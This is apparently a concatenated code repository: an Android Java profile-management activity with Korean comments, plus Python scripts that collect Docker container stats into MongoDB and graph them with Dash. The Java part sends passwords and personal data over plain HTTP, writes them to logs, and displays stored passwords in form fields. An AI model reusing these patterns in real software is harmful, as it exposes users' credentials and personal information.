// 인텐트를 통해 전달 받은 값을 execute해야 함
new MypageActivity.Json_select().execute(usr_id_recv, usr_code_recv);
} catch (KakaoParameterException e) {
e.printStackTrace();
}
// TextView Scrolling 가능하게 하기
Mypage_ADDR_Show.setMovementMethod(new ScrollingMovementMethod().getInstance());
}
// 영어만 입력하기 위한 필터 처리 해주는 코드
protected InputFilter filter_mypage= new InputFilter() {
public CharSequence filter(CharSequence source, int start, int end, Spanned dest, int dstart, int dend) {
Pattern ps = Pattern.compile("^[a-zA-Z0-9]+$");
if (!ps.matcher(source).matches()) {
return "";
}
return null;
}
};
public void Mypage_Btn_click(View v) {
switch (v.getId()) {
case R.id.Mypage_Btn: // 카카오 버튼을 통해 코드번호를 보내기 위함
final KakaoTalkLinkMessageBuilder kakaoTalkLinkMessageBuilder
= kakaoLink.createKakaoTalkLinkMessageBuilder();
try {
kakaoTalkLinkMessageBuilder.addText("안녕하세요~ \n\""+Mypage_NAME.getText().toString()+"\" 님의 가족분이 사용할 코드는 \n => "
+ Mypage_CODE.getText().toString()+" 입니다.\n 확인 후 로그인 해주세요");
kakaoLink.sendMessage(kakaoTalkLinkMessageBuilder, this); // 메시지 전송
} catch (KakaoParameterException e) {
e.printStackTrace();
}
finish();
break;
case R.id.Mypage_Cancel: // 취소 버튼 클릭시
startActivity(new Intent(this, MainActivity.class));
finish();
break;
case R.id.Mypage_Delete: // 회원 탈퇴 버튼 클릭 시 한번 더 물어보자
new AlertDialog.Builder(this)
.setTitle("중요알림")
.setMessage("정말 탈퇴 하시겠습니까?")
.setPositiveButton("네", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
new Json_Delete().execute(usr_code_json);
startActivity(new Intent(getApplicationContext(), MainActivity.class));
finish();
}
})
.setNegativeButton("아니요", null)
.show();
break;
case R.id.Mypage_Update: // 회원 정보 변경 버튼 클릭시
usr_id_json = Mypage_ID.getText().toString();
usr_pw_json = Mypage_PW1.getText().toString();
usr_pw_r_json = Mypage_PW2.getText().toString();
usr_name_json = Mypage_NAME.getText().toString();
usr_phone_json = Mypage_PN.getText().toString();
usr_code_json =Mypage_CODE.getText().toString();
new Json_Update().execute(usr_id_json,usr_pw_json,usr_pw_r_json,usr_name_json,usr_addr_json,usr_phone_json,usr_code_json);
break;
case R.id.Mypage_Addr_Btn: // 회원 주소 변경 버튼 클릭시
Intent in_getData = new Intent(MypageActivity.this, AdselectActivity.class);
startActivityForResult(in_getData, 0);
break;
}
}
public class Json_Delete extends AsyncTask<String,Void,String> {
private ProgressDialog Back_dialog = new ProgressDialog(MypageActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
Back_dialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
Back_dialog.setMessage("잠시만 기다려 주세요.");
Back_dialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Back_dialog.dismiss();
Log.e("Delete_Post Value : ", res);
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text(res)
.show(MypageActivity.this);
Mypage_ID.setText("");
Mypage_PW1.setText("");
Mypage_PW2.setText("");
Mypage_NAME.setText("");
Mypage_ADDR_Show.setText("");
Mypage_PN.setText("");
Mypage_CODE.setText("");
}
@Override
protected String doInBackground(String... params) {
String usr_code = (String) params[0];
String server_URL = "http://192.168.127.12/hdelete.php";
String postParameters = "usr_code=" + usr_code;
Log.e("Delete_postParameters : ", postParameters);
try {
URL url = new URL(server_URL);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(TAG, "InsertData: Error ", e);
return new String("Error: " + e.getMessage());
}
}
}
///////////////////////////----Delete AsyncTask 끝----////////////////////////////////
public class Json_Update extends AsyncTask<String,Void,String>{
private ProgressDialog Back_dialog = new ProgressDialog(MypageActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
Back_dialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
Back_dialog.setMessage("잠시만 기다려 주세요.");
Back_dialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Back_dialog.dismiss();
Log.e("Update_Post Value : ", res);
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text(res)
.show(MypageActivity.this);
}
@Override
protected String doInBackground(String... params) {
try {
for (int i = 0; i < 3; i++) {
Back_dialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
String usr_id = (String) params[0];
String usr_pw1 = (String) params[1];
String usr_pw2 = (String) params[2];
String usr_name = (String) params[3];
String usr_addr = (String) params[4];
String usr_phone = (String) params[5];
String usr_code = (String) params[6];
String server_URL = "http://192.168.127.12/hupdate.php";
String postParameters = "usr_id=" + usr_id + "&usr_pw1=" + usr_pw1 + "&usr_pw2=" + usr_pw2 + "&usr_name=" + usr_name + "&usr_addr=" + usr_addr + "&usr_phone="
+ usr_phone + "&usr_code=" + usr_code;
Log.e("Update_postParameters : ", postParameters);
try {
URL url = new URL(server_URL);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(TAG, "Update Data: Error ", e);
return new String("Error: " + e.getMessage());
}
}
}
///////////////////////////----Update AsyncTask 끝----////////////////////////////////
public class Json_select extends AsyncTask<String, Void, String> {
private ProgressDialog progressDialog = new ProgressDialog(MypageActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
// 프로그래스바를 이용
progressDialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
progressDialog.setMessage("잠시만 기다려 주세요.");
progressDialog.show();
}
@Override
protected String doInBackground(String... params) {
try {
for (int i = 0; i < 3; i++) {
progressDialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
// Login한 사용자를 얻기 위해서는 Intent로 사용자의 Id값을 전달 받아서 post방식으로 날리는 방식이 좋을 것 같다.
// -> MainActivity -> LoginActivity -> MypageActivity 순으로 Intent로 값을 전달해 주어 해결하였다.
// Login한 사용자의 정보를 서버 DB를 통해 받아와서 Mypage의 각각 EditText에 뿌려주는 역할을 하는 부분
// 인텐트로 값(아이디,비밀번호1,비밀번호2, 이름, 주소, 연락처, 코드번호)을 넘겨주고 MypageActivity에서 받는다.
// -> 이 방법은 상당히 비효율적이라 생각한다. MypageActivity에서 처리하도록 하자.
usr_id = (String) params[0]; // 사용자의 ID를 가져옴
usr_code = (String) params[1]; // 사용자의 CODE를 가져옴
return getJsonText();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
// 프로그래스바를 종료시킬 것
Log.e("모든 정보를 얻어 온다", res);
progressDialog.dismiss();
}
} // 서버 -> 안드로이드로 세밀하게 받아오기 위한 코드
public String getJsonText() {
StringBuffer sb = new StringBuffer();
try {
//주어진 URL 문서의 내용을 문자열로 얻는다.
String jsonPage = getStringFromUrl("http://5192.168.3.11/hselect.php");
//읽어들인 JSON포맷의 데이터를 JSON객체로 변환
JSONObject json = new JSONObject(jsonPage);
Log.e("json : ", json.toString());
Gson gson = new Gson();
String json_g = gson.toJson(json);
Log.e("Gson_name : ", json_g.substring(20, 24));
String str_1 = json_g.substring(20, 24);
if (str_1.equals("Code")) {
JSONArray jArr_code = json.getJSONArray("Code");
if (jArr_code != null) {
try {
for (int i = 0; i < jArr_code.length(); i++) {
json = jArr_code.getJSONObject(i);
// Json으로 서버에 저장되어있는 회원 정보를 불러오기 위함.
usr_id_json = json.getString("usr_id");
usr_pw_json = json.getString("usr_pw");
usr_pw_r_json = json.getString("usr_pw_r");
usr_name_json = json.getString("usr_name");
usr_addr_json = json.getString("usr_addr");
usr_phone_json = json.getString("usr_phone");
usr_code_json = json.getString("usr_code");
runOnUiThread(new Runnable() {
@Override
public void run() {
Mypage_ID.setText(usr_id_json);
Mypage_PW1.setText(usr_pw_json);
Mypage_PW2.setText(usr_pw_r_json);
Mypage_NAME.setText(usr_name_json);
Mypage_ADDR_Show.setText(usr_addr_json);
Mypage_PN.setText(usr_phone_json);
Mypage_CODE.setText(usr_code_json);
}
});
}
} catch (Exception e) {
Log.e("Error msg : ", e.toString());
}
}
Log.e("코드로 로그인 했다 ; ", json_g.substring(20, 24));
}
Log.e("Gson_name : ", json_g.substring(20, 28));
String str1 = json_g.substring(20, 28);
if (str1.equals("Userinfo")) {
JSONArray jArr_usr = json.getJSONArray("Userinfo");
if (jArr_usr != null) {
for (int i = 0; i < jArr_usr.length(); i++) {
json = jArr_usr.getJSONObject(i);
// Json으로 서버에 저장되어있는 회원 정보를 불러오기 위함.
usr_id_json = json.getString("usr_id");
usr_pw_json = json.getString("usr_pw");
usr_pw_r_json = json.getString("usr_pw_r");
usr_name_json = json.getString("usr_name");
usr_addr_json = json.getString("usr_addr");
usr_phone_json = json.getString("usr_phone");
usr_code_json = json.getString("usr_code");
runOnUiThread(new Runnable() {
@Override
public void run() {
Mypage_ID.setText(usr_id_json);
Mypage_PW1.setText(usr_pw_json);
Mypage_PW2.setText(usr_pw_r_json);
Mypage_NAME.setText(usr_name_json);
Mypage_ADDR_Show.setText(usr_addr_json);
Mypage_PN.setText(usr_phone_json);
Mypage_CODE.setText(usr_code_json);
}
});
}
}
Log.e("이 사람이다 ; ", json_g.substring(20, 28));
}
} catch (Exception e) {
e.printStackTrace();
}
return sb.toString();
}
// getStringFromUrl : 주어진 URL의 문서의 내용을 문자열로 반환
public String getStringFromUrl(String pUrl) {
String postParameters = "usr_id=" + usr_id + "&usr_code=" + usr_code;
try {
URL url = new URL(pUrl);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(ContentValues.TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
Log.d("my_data:", line);
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(ContentValues.TAG, "RecvData: Error ", e);
return new String("Error: " + e.getMessage());
}
}
// Receives the address picked in the Daum postcode activity (launched via
// startActivityForResult) and displays it in the address field.
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
    switch (requestCode) { // dispatch on the request code passed to startActivityForResult
        case 0: // the address value returned from Daum
            if (resultCode == RESULT_OK) {
                str = data.getStringExtra("myaddr");
                // Keep the cached profile field in sync with the newly picked address.
                usr_addr_json=str;
                Log.e("잘 받았어 고마워 : ", str);
                // UI widgets may only be touched on the main thread.
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                        Mypage_ADDR_Show.setText(str);
                    }});
            }
            break;
    }
}
// Intercepts the hardware back button and asks for confirmation before
// finishing the activity.
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) { // confirm exit when the back button is pressed
    switch (keyCode) {
        case android.view.KeyEvent.KEYCODE_BACK:
            // Dialog text (Korean): title "Notice", message "Do you want to exit?".
            new AlertDialog.Builder(this)
                    .setTitle("알림")
                    .setMessage("종료하시겠습니까?")
                    .setPositiveButton("YES", new DialogInterface.OnClickListener() {
                        @Override
                        public void onClick(DialogInterface dialog, int which) {
                            finish();
                        }
                    })
                    .setNegativeButton("NO", null)
                    .show();
            break;
        default:
            break;
    }
    // Let the platform's default key handling run as well.
    return super.onKeyDown(keyCode, event);
}
} | 653343058b93301a8821dff5814d643fccc7663f | [
"Java"
] | 4 | Java | KiHwanHong/Smart_Hm | c09600e9837a5534ed49e06a8257f9934ff49a03 | 10e98b9ebca3f89add503ab2d9824823e9420d29 |
refs/heads/master | <file_sep>from pymongo import MongoClient
from datetime import datetime
import os
class mongoGuest:
    """Read-only helper over the stats collection written by the dbstore collector.

    Each document has the shape {"time": datetime, "stats": [per-container dicts]}.
    """

    def __init__(self):
        self.collection = MongoClient(os.environ['DB_PORT_27017_TCP_ADDR'], 27017)['test']['t']

    def find_cpu_percentage(self, con):
        """Return one container sample's CPU load as a percentage.

        Same delta formula `docker stats` uses:
        (container cpu delta / system cpu delta) * online_cpus * 100.
        Returns 0.0 when either delta is not positive (e.g. the first sample).
        """
        cpu_delta = con["cpu_usage"] - con["pre_cpu_usage"]
        system_delta = con["system_cpu_usage"] - con["presystem_usage"]
        if cpu_delta > 0.0 and system_delta > 0.0:
            return (cpu_delta / system_delta) * con["online_cpus"] * 100.0
        return 0.0

    def changeHMS(self, time):
        """Format a datetime as HH:MM:SS for use as an x-axis label."""
        return time.strftime("%H:%M:%S")

    def _series(self, cont_name, value_of):
        """Build (labels, values) for one container, oldest sample first.

        `value_of` maps a per-container stats dict to the y-axis value.
        FIX: fetches the collection once and sorts the documents in memory;
        the original collected every timestamp, then issued one extra find()
        per timestamp and re-read the same first document whenever two
        samples shared a timestamp.
        """
        X = []
        Y = []
        for doc in sorted(self.collection.find(), key=lambda d: d["time"]):
            for con in doc['stats']:
                if con['name'] == cont_name:
                    Y.append(value_of(con))
                    X.append(self.changeHMS(doc["time"]))
        return (X, Y)

    def get_cpu_usage(self, cont_name, percent=False):
        """Return (time_labels, cpu_values) for `cont_name`.

        With percent=True the values come from find_cpu_percentage; otherwise
        the raw cumulative cpu_usage counters are returned.
        """
        if percent == True:
            return self._series(cont_name, self.find_cpu_percentage)
        return self._series(cont_name, lambda con: con["cpu_usage"])

    def get_memory_usage(self, cont_name):
        """Return (time_labels, memory_values) for `cont_name`."""
        return self._series(cont_name, lambda con: con['memory_usage'])
'''
def get_cpu_usage(self,cont_id,percent=False):
time = 1
X = []
Y = []
for doc in self.collection.find():
for con in doc['stats']:
if con['name'] == cont_id:
if percent==True:
Y.append(self.find_cpu_percentage(con))
else:
Y.append(con["cpu_usage"])
X.append(time)
time+=1
return (X,Y)
def get_memory_usage(self,cont_id):
time = 1
X = []
Y = []
for doc in self.collection.find():
for con in doc['stats']:
if con['name'] == cont_id:
Y.append(con['memory_usage'])
X.append(time)
time += 1
return (X,Y)
'''
<file_sep>FROM ubuntu:latest
RUN apt-get update && apt-get install -y cron
RUN apt-get install -y software-properties-common vim
RUN add-apt-repository ppa:jonathonf/python-3.6
RUN apt-get update
RUN apt-get install -y build-essential python3.6 python3.6-dev python3-pip python3.6-venv
RUN python3.6 -m pip install pip --upgrade
RUN python3.6 -m pip install wheel
WORKDIR /dbstore
ADD . /dbstore
RUN pip install -r requirements.txt
#ADD crontab /etc/cron.d/dbstore-cron
#RUN chmod 0644 /etc/cron.d/dbstore-cron
<file_sep>import dash
from dash.dependencies import Output,Input,Event
import dash_core_components as dcc
import dash_html_components as html
import plotly
import random
import plotly.graph_objs as go
from collections import deque
from pymongo import MongoClient
from time import sleep
import numpy as np
app = dash.Dash(__name__)
app.layout = html.Div(children=[
html.Div(children=[
html.Div(html.Button(id ='click-me',children='Click Me',className='btn btn-primary',n_clicks=0),className='col-md-1'),
#html.Div(id = 'put-graph-here',className='col-md-10'),
dcc.Graph(id = 'my-graph'),
],className='row')
],className='container')
'''
@app.callback(Output('put-graph-here','children'),
[Input('click-me','n_clicks')])
def draw_graph(n_clicks):
data = ''
if n_clicks > 0:
data = dcc.Graph(
id = 'my-graph',
figure = {
'data':go.Scatter(
x = np.arange(0,60),
y = np.random.randint(0,100),
type = 'Scatter',
mode = 'lines+markers'
),
'layout':go.Layout(title = 'My-graph')
})
return dcc.Graph(id = 'my-graph')
'''
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
'external_url': my_css_url
})
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>pymongo
docker
dash==0.21.0
dash-renderer==0.12.1
dash-html-components==0.10.0
dash-core-components==0.22.1
<file_sep>from datetime import datetime,timedelta
from pymongo import MongoClient
from pymongo.operations import DeleteOne,InsertOne
import docker
import json
from time import sleep
import os
import logging
import time
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
logger = logging.getLogger(__file__)
hdlr = logging.FileHandler(os.path.join(dir_path,'{}.log'.format(__file__.split('.')[0])))
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
class dockerGuest:
    """Wrapper around docker.APIClient targeting the daemon named in a JSON
    config file of the form {"host": ..., "port": ..., "collection": ...}."""
    def __init__(self,config_file):
        self.config_file=config_file
        self.client = docker.APIClient(base_url = self.get_url(self.config_file))
    def get_url(self,config_file):
        """Resolve the docker daemon URL from the config file next to this script.

        localhost/127.0.0.1 selects the local unix socket; any other host is
        treated as a remote daemon reachable over TCP.
        """
        dir_path = os.path.dirname(os.path.realpath(__file__))
        file_path = os.path.join(dir_path,config_file)
        # NOTE(review): this file handle is never closed explicitly --
        # harmless on CPython but worth wrapping in `with` eventually.
        config_data = json.load(open(file_path))
        host = config_data["host"]
        port = config_data["port"]
        if host=="localhost" or host=="127.0.0.1":
            return "unix://var/run/docker.sock" #local
        else:
            return "tcp://{}:{}".format(host,port) #remote
    def container_list(self):
        '''
        Return the list of running containers as reported by the daemon.
        '''
        return self.client.containers()
    def get_stats(self):
        '''
        Return one stats snapshot per running container, or None when no
        container is running. Each entry keeps only the fields the graphing
        side needs (cpu/memory counters plus their previous-sample values).
        '''
        stat_list = []
        container_list = self.container_list()
        if len(container_list) == 0:
            return None
        for container in container_list:
            _id = container['Id']
            # stream=False -> a single synchronous stats sample per container.
            _dict = self.client.stats(container=_id,stream=False)
            stat_dict = {}
            stat_dict["_id"] = _id
            stat_dict["name"] = _dict["name"][1:]  # strip the leading '/' docker prepends
            stat_dict["cpu_usage"] = _dict["cpu_stats"]["cpu_usage"]["total_usage"]
            stat_dict["system_cpu_usage"] = _dict["cpu_stats"]["system_cpu_usage"]
            stat_dict["pre_cpu_usage"] = _dict["precpu_stats"]["cpu_usage"]["total_usage"]
            stat_dict["presystem_usage"]=_dict["precpu_stats"]["system_cpu_usage"]
            online_cpus = _dict["cpu_stats"]["online_cpus"]
            if online_cpus == 0.0:
                # Fallback: derive the CPU count from the per-cpu usage list.
                online_cpus = len(_dict["cpu_stats"]["cpu_usage"]["percpu_usage"])
            stat_dict["online_cpus"] = online_cpus
            stat_dict["memory_usage"] = _dict["memory_stats"]["usage"]
            stat_list.append(stat_dict)
        return stat_list
class Stat:
    """Samples container stats via dockerGuest and persists them to MongoDB.

    The collection acts as a bounded ring buffer: once `cap` documents exist,
    the oldest (by `time`) is dropped before each insert.
    """

    def __init__(self, config_file):
        self.docker = dockerGuest(config_file)
        self.config_file = config_file
        # Mongo host comes from the docker-link environment variable.
        self.collection = MongoClient(os.environ['DB_PORT_27017_TCP_ADDR'], 27017)['test'][self.get_collection()]

    def get_collection(self):
        """Return the collection name from the config file next to this script."""
        dir_path = os.path.dirname(os.path.realpath(__file__))
        file_path = os.path.join(dir_path, self.config_file)
        # FIX: close the config file handle (the original leaked it).
        with open(file_path) as f:
            return json.load(f)["collection"]

    def get_config_file(self):
        return self.config_file

    @staticmethod
    def get_time():
        """Timestamp for a sample; a native datetime so Mongo can sort on it."""
        return datetime.now()

    def data_to_save(self):
        """Build one document {time, stats}; None when no containers are running."""
        stats = self.docker.get_stats()
        if stats is None:
            return None
        return {"time": Stat.get_time(), "stats": stats}

    def save(self, cap=60):
        """Insert a new sample, evicting the oldest document(s) at capacity.

        FIX: skips the insert when there is nothing to save (the original
        passed None straight to insert_one) and evicts with a while/>= loop
        so an over-full collection shrinks back to the cap instead of never
        matching the exact `== cap` check again.
        """
        new_data = self.data_to_save()
        if new_data is None:
            logger.info("No running containers; nothing saved")
            return
        while self.collection.count() >= cap:
            top_doc_time = min(doc['time'] for doc in self.collection.find())
            self.collection.delete_one({'time': top_doc_time})
        self.collection.insert_one(new_data)
        logger.info("Saved in DB...")

    def save_to_db(self):
        """Legacy save path kept for compatibility; prefer save()."""
        data = self.data_to_save()
        if data is not None:
            if self.is_db_full():
                self.make_space_db()
            logger.info('DB Save')
            self.collection.insert_one(data)

    def make_space_db(self):
        """Drop the first document the cursor yields (legacy eviction)."""
        logger.info('Making space')
        self.collection.delete_one({'_id': self.collection.find()[0]['_id']})

    def is_db_full(self, cap=60):
        """True when the collection holds at least `cap` documents."""
        if self.collection.find({}).count() >= cap:
            return True
        return False
def get_scheduled_job():
    """Entry point for one collection run: sample every container and persist."""
    stat = Stat('config.json')
    logger.info('Main Job')
    stat.save()
# Runs on import/execution; cron invokes this script once a minute.
get_scheduled_job()
<file_sep>import dash
from dash.dependencies import Output,Input,Event,State
import dash_core_components as dcc
import dash_html_components as html
import plotly
from dockerGuest import dockerGuest
import random
docker=dockerGuest()
app = dash.Dash(__name__)
def generate_graph():
return html.Table(
[html.Tr([html.Th('Name'),html.Th('Roll')])]+
[html.Tr([html.Td('<NAME>'),html.Td('12345')])]+
[html.Tr([html.Td('<NAME>'),html.Td('5666')])]
)
app.layout = html.Div([
html.H4('This is a table'),
generate_graph(),
],className='container')
#---------------Bootstrap CSS-------------------#
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
"external_url":my_css_url
})
#------------------------------------------------#
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>p=`which python`
echo $p
<file_sep>import dash
from dash.dependencies import Output,Input,Event,State
import dash_core_components as dcc
import dash_html_components as html
import plotly
import plotly.graph_objs as go
from mongoGuest import mongoGuest
from dockerGuest import dockerGuest
import random
docker=dockerGuest()
mongo = mongoGuest()
app = dash.Dash(__name__)
#---------------CSS Styling------------#
table_style = {
'borderCollapse':'collapse',
'width':'100%',
'fontSize':'20px'
}
tableh_style = {
'border':'1px solid #dddddd',
'padding':'8px',
'backgroundColor':'#F2F2F2',
}
tabled_style = {
'border':'1px solid #dddddd',
'padding':'8px',
}
#-------------------------------------#
#------------APP Layout-------------------------------------------#
def generate_table():
return html.Table(
[html.Tr([html.Th('Id'),html.Th('Image'),html.Th('IPAddress'),html.Th('Gateway')],style=tableh_style)]+
[html.Tr([dcc.Link(html.Td(con['Id']),href=con['Id']),html.Td(con['Image']),html.Td(con['IPAddress']),html.Td(con['Gateway'])],
style=tabled_style) for con in docker.get_cont_list()],className='table table-bordered',style=table_style
)
def serve_layout():
return html.Div([
html.Div([
dcc.Location(id='url',refresh=False),
html.Div([
html.H2('Containers',style={'color':'#FFFFFF'}),
],className='row',style={'textAlign':'center','backgroundColor':'#000000'}),
html.Div([
generate_table()
],className='row'),
],id='index-page'),
html.Div([
html.Div([
html.Div([
dcc.Graph(id='cpu-usage-graph'),
],id='cpu-usage',className='col-md-6'),
html.Div([
dcc.Graph(id='memory-usage-graph'),
],id='memory-usage',className='col-md-6')
],className='row'),
],id='graph-page',style={'display':'none'}),
],className='container')
app.layout = serve_layout
#---------------------------------------------------------#
@app.callback(Output('index-page','style'),
[Input('url','pathname')])
def vanish(pathname):
if len(pathname) > 1:
return {'display':'none'}
@app.callback(Output('graph-page','style'),
[Input('url','pathname')])
def appear(pathname):
if len(pathname)>1:
return {'display':'block'}
#------CPU Usage Graph generating callback-----------------#
def generate_cpu_data(cont_id):
return mongo.get_cpu_usage(cont_id)
@app.callback(Output('cpu-usage-graph','figure'),
    [Input('url','pathname')])
def show_cpu_usage_graph(pathname):
    """Render the CPU-usage scatter for the container named in the URL path.

    FIX: the guard was `len(pathname)`, which is truthy for the bare "/"
    path and raises TypeError when dash passes None on initial load; the
    memory callback already used `> 1`. Also guards the empty series so
    min()/max() cannot raise for an unknown container id.
    """
    if pathname and len(pathname) > 1:
        X, Y = generate_cpu_data(pathname[1:])
        if not X:
            # Unknown container or no samples yet: nothing to plot.
            return {'data': [], 'layout': go.Layout(xaxis={'title': 'Time'}, yaxis={'title': 'CPU'})}
        data = go.Scatter(
            x=X,
            y=Y,
            name='Scatter',
            mode='lines+markers'
        )
        layout = go.Layout(
            xaxis={'title': 'Time', 'range': [min(X), max(X)]},
            yaxis={'title': 'CPU', 'range': [min(Y), max(Y)]},
        )
        return {'data': [data], 'layout': layout}
#----------------------------------------------
#------Memory Usage Graph Generating Callback------#
def generate_memory_data(cont_id):
return mongo.get_memory_usage(cont_id)
@app.callback(Output('memory-usage-graph','figure'),
[Input('url','pathname')])
def show_memory_usage_graph(pathname):
if len(pathname)>1:
X,Y = generate_memory_data(pathname[1:])
data = go.Scatter(
x = X,
y = Y,
name='Scatter',
mode='lines+markers'
)
layout= go.Layout(
xaxis = {'title':'Time','range':[min(X),max(X)]},
yaxis = {'title':'Memory','range':[min(Y),max(Y)]},
)
return {'data':[data],'layout':layout}
#---------------------------------------------
#---------------Bootstrap CSS-------------------#
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
"external_url":my_css_url
})
#------------------------------------------------#
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>from dash.dependencies import Input,Output
import dash_html_components as html
import dash_core_components as dcc
from app import app
from apps import app1,app2
def generate_table():
return html.Table(
[html.Tr([html.Th('Name'),html.Th('Roll')])]+
[html.Tr([html.Td(dcc.Link('<NAME>',href='soham')),html.Td('34512')])]+
[html.Tr([html.Td(dcc.Link('<NAME>',href='ricky')),html.Td('461678')])]
)
app.layout = html.Div([
dcc.Location(id='url',refresh=False),
generate_table(),
html.Div(id='page-content'),
])
@app.callback(Output('page-content','children'),
[Input('url','pathname')])
def generate(pathname):
return html.H3('My name is {}'.format(pathname[1:]))
if __name__ =='__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>import dash
import dash_html_components as html
import dash_core_components as dcc
from app import app
layout = html.Div([
html.H4('App 1'),
dcc.Link('Go to App 2',href='/apps/app2'),
dcc.Link('Go home',href = '/')
])
<file_sep>from datetime import datetime,timedelta
from pymongo import MongoClient
import docker
from time import sleep
class dockerGuest:
def __init__(self):
self.client = docker.APIClient(base_url = 'unix://var/run/docker.sock')
def container_list(self):
return self.client.containers()
def get_stats(self):
stat_list = []
container_list = self.container_list()
if len(container_list) == 0:
return None
for container in container_list:
_id = container['Id']
_dict = self.client.stats(container=_id,stream=False)
stat_dict = {}
stat_dict["_id"] = _id
stat_dict["name"] = _dict["name"][1:]
stat_dict["cpu_usage"] = _dict["cpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["system_cpu_usage"] = _dict["cpu_stats"]["system_cpu_usage"]
stat_dict["pre_cpu_usage"] = _dict["precpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["presystem_usage"]=_dict["precpu_stats"]["system_cpu_usage"]
online_cpus = _dict["cpu_stats"]["online_cpus"]
if online_cpus == 0.0:
online_cpus = len(_dict["cpu_stats"]["cpu_usage"]["percpu_usage"])
stat_dict["online_cpus"] = online_cpus
stat_dict["memory_usage"] = _dict["memory_stats"]["usage"]
stat_list.append(stat_dict)
return stat_list
class Stat:
timestamp = 1
def __init__(self):
self.docker = dockerGuest()
self.client = MongoClient()
self.db = self.client.test
self.file = '/home/sohdatta/my-gcc-app/myproject/project/test'
@staticmethod
def get_time():
time = datetime.now()
return time.strftime('%H:%M:%S')
def data_to_save(self):
stats = self.docker.get_stats()
if stats == None:
return None
global_stat_dict ={}
global_stat_dict["time"]=Stat.get_time()
global_stat_dict["stats"] = stats
return global_stat_dict
def save_to_db(self):
data = self.data_to_save()
